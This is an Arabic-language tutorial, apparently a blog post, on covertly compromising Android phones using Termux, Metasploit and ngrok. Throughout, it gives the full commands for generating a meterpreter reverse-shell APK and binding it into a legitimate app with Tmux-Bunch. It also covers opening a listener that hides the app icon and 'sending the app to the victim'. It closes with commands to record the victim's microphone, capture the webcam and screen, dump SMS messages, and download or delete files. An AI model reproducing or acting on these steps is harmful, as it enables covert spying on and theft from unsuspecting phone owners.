تعريف مصطلحات والادوات اللي بنستخدمها
المصطلح الاول
بورت|Port
منفذ او شباك للوصل بين شيئين
المصطلح الثاني
بايلود|pyload
حمولة يتم ارسالها للضحيه لكي يفتح منفذ او باب سري في الجهاز تتيح للمخترق التسلل للجهاز
المصطلح الثالث
جلسة تنصت
مكان ارسال واستقبال الاوامر والملفات من جهازك الى جهاز الضحيه والعكس
السكربت الاول
ميتاسبلوست|ميتا|metasploit
هو عبارة عن مكتبة من الأدوات ، وقواعد بيانات لمجموعة من الثغرات التي يتم اكتشافها
السكربت الثاني
نجروك|ngrok
اداة تقوم بفتح بورت (منفذ للاتصال و الارسال بين الضحية و المهاجم )
السكربت الثالث
تيمكس|temux bunch
اداة لحقن البايلودات في التطبيقات
السكربت الرابع
Exploit Android Stagefright
حقن فيديو واختراق الجهاز بفيديو
شرح مبسط اولي
لكي نخترق جهاز اولا يجب ان نصنع بايلود لكي نرسله الى الضحيه ثم نفتح جلسة تنصت ونربط البايلود و جلسة التنصت باستخدام بورت
رابط تحميل تيرمكس
رابط التحميل من جوجل بلاي :
اساسيات تيرمكس
[+] افتح تيرمكس
[+] اكتب الاوامر التالية :
termux-setup-storagepkg update -y && pkg upgrade -y && pkg install git -y && pkg install python -y && pkg install python2 -y && pkg install curl -y && pkg install wget -y && pkg install ruby -y && pkg install perl -y && pkg install proot -y تحميل الميتاسبلويت
افتح تيرمكس
اكتب الاوامر التالية :
curl -LO https://raw.githubusercontent.com/Hax4us/Metasploit_termux/master/metasploit.sh
chmod +x metasploit.sh
bash metasploit.sh
cd metaaploit-framework
bundle install rake-12.3.1
bundle config build.nokogiri--use-system--libraries
gem install nokogiri
gem install pkg-config -v rake-12.3.1
bundle install rake-12.3.1تحميل نجروك
الدخول الى الرابط التالي وهو موقع نجروك الاساسي :
الضغط على كلمة sign up التي بالاحمر لتسجيل حساب جديد
إملاء الخانات التاليه المعروضة في الموقع :
- your name|اسمك
- your email|إيميلك
- confirm email|اعد كتابة ايميلك
- password|كلمة السر
- وخذ اختبار الكابتشا
- اضغط على sign up
- إنتهى شرح تسجيل الدخول
انزل الى الاسفل وسنجد 4 مربعات
- المربع الاول : download ngrok
- المربع الثاني : unzip to install
- المربع الثالث : confirm your account
- المربع الرابع : fire it up
- سنحتاج الاول والثالث فقط
نضغط المريع الاول وسيبدء التحميل
مابعد التحميل :
ادخل الى تيرمكس
cd /sdcard/downloadامر الدخول الى الذاكرة الداخليه/ملف التحميلات
cp ngrok-stable-linux-arm.zip $HOMEامر نسخ ملف النجروك الى الهوم
cd $HOMEامر الدخول للهوم
unzip ngrok-stable-linux-arm.zip فك الضغط عن ملف نجروك
rm ngrok-stable-linux-arm.zip امر حذف الملف المضغوط
الدخول الى الموقع والتوجه الى المربع الثالث ستجدون رمز طويل بالخط الابيض وخلفيه سوداء انسخوه
اذهبو الى تيرمكس
الصقو الرمز
شرح فتح بورت نجروك
الدخول الى تيرمكس
cd $HOME ./ngrok tcp [port]يفضل فتح البورت 4444 او 8080
مثال :
./ngrok tcp 4444طريقة التاكد من ان البورت مفتوح
ظهور كلمة online بالاخضر
حل عدم فتح بورت
الذهاب الى تيرمكس
اكتب
apt update
apt upgrade
pkg install proot
termux-chrootاذا لم ينجح :
- فعل الفي بي ان
- اذا لم ينجح :
- اذا لم ينجح :
- شغل 3g او 4g
- غير تحديث التيرمكس
- اذا لم ينجح :
- المشكلة ليست مع الطريقة ستكون المشكلة من مزود الخدمه بعض الشركات لا تسمح بفتح بورتات في الشبكة
صنع بايلود تطبيق من الميتاسبلويت
ادخل الى التيرمكس
فتح بورت ونسخ البورت المفتوح
cd $HOME/metasploit-framework
msfvenom -p android/meterpreter/reverse_tcp LHOST=tcp://0.tcp.ngrok.io LPORT=$port -o /sdcard/$name.apkمكان $port ضعو البورت المقتوح
مكان $name ضعو اسم التطبيق
سيتم صنع البورت ونقله الى الصفحه الرئيسية من الذاكرة الداخليه
فتح جلسة تنصت بايلود تطبيق
[+] الذهاب الى تيرمكس
cd /$HOME/metasploit-framework
./msfconsole
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost tcp://0.tcp.ngrok.io
set lport $port
exploit -x hide_app_icon[+] ارسل التطبيق الى الضحيه
تحميل حاقن تطبيقات
اسم سكربت الحاقن هو temux-bunch
الدخول الى تيرمكس
git clone https://github.com/Hax4us/Tmux-Bunch
cd $HOME
cd Tmux-Bunch
chmod +x ./setup
./setupحقن بايلود في تطبيق
- نضع التطبيق المراد حقنه في تلصفحة الرئيسية من الذاكرة الداخليه
- نفتح بورت في الشبكه
الدخول الى تيرمكس
امر الدخول الئ الذاكرة الداخلية
cd /sdcardامر نقل التطبيق الئ واجهة التيرمكس الرئيسية
mv $name.apk $HOMEامر الذهاب الئ واجهة التيرمكس الرئيسية
cd $HOMEامر نقل التطبيق الئ اداة الحقن
mv $name.apk temux-bunchامر الدخول الئ مجلد اداة الحقن
cd tmux-bunchامر نقل التطبيق الئ مجلد binder
mv $name.apk binderامر تشغيل الاداة
./tmuxbunchبعد تشخيل الاداه
نكتب بلترتيب :
- 6
- 1
- tcp://0.tcp.ngrok.io
- $port
- $name
- اضغط انتر مرتين
- 10
- انتر
امر الدخول الئ مجلد embout الذي يتواجد فيه التطبيق الذي تم حقنة
cd emboutامر نقل التطبيق الئ واجهة Termux الرئيسية
mv $name.apk $HOMEامر العودة مرتين الئ واجهة Termux الرئيسية
cd ..\..امر نقل التطبيق الئ ذاكرة الجهاز الداخلية
mv $name.apk /sdcard
ستجد التطبيق في الصفحه الرئيسيه من الذاكره الداخليه
تفاصيل عن الحاقن
بعض الاحيان لن يستطيع الحاقن من حقن البايلود في تطبيق لان التطبيق محمي
فتح جلسة التنصت تطبيق بايلود تطبيق
الذهاب الى تيرمكس
اكتب
للدخول الئ الميتاسبلويت
cd /$HOME/metasploit-frameworkتشغيل الميتاسبلويت
./msfconsoleاستخدام خاصية الاتصال بلجهاز البعيد
use exploit/multi/handlerنختار نوع البرمجية في الجهاز البعيد
set payload android/meterpreter/reverse_tcpنضع الهوست الذي هو سيرفر ngrok الموجود بلحمولة من اجل الاتصال بلجهاز البعيد
set lhost tcp://0.tcp.ngrok.ioنضع البورت او المنفذ
set lport $portنقوم بتشغيل انتضار اتصال الجهاز البعيد
exploit -x hide_app_iconمن ثم ارسل التطبيق الى الضحيه
اوامر التحكم بجهاز الضحيه
rebootلاعادة تشغيل جهاز الضحيه
shultdown لاطفاء جهاز الضحيه
screenshotلتصوير شاشة الضحيه
ps لاظهار البرامج الشغاله في جهاز الضحيه
upload /sdcard/$name.apk \$name.apkلارسال برنامج او كلف الى جهاز الضحيه
download $name.apk لتحميل ملف من جهاز الضحيه الى جهازك
cd /sdcard لدخول الى ملفات الضحيه
rm $name.nameلحذف ملف من جهاز الضحيه
record_mic -d $s لتسجيل صوت من جهاز الضحيه
$s تمثل عدد ثواني التسجيل
webcam_snapلتصوير من الكاميرا الاماميه
webcam_stream -d $sلتصوير فيديو من الكاميرا الاماميه
dump_smsلاظهار رسائل الاس ام اس
cd $fileتمثل $file اسم الملف
للدخول الى ملف معين
cd ..للرجوع الى الملف السابق
cd /sdcard1 للدخول الى الذاكرة الخارجيه
تعليقات
إرسال تعليق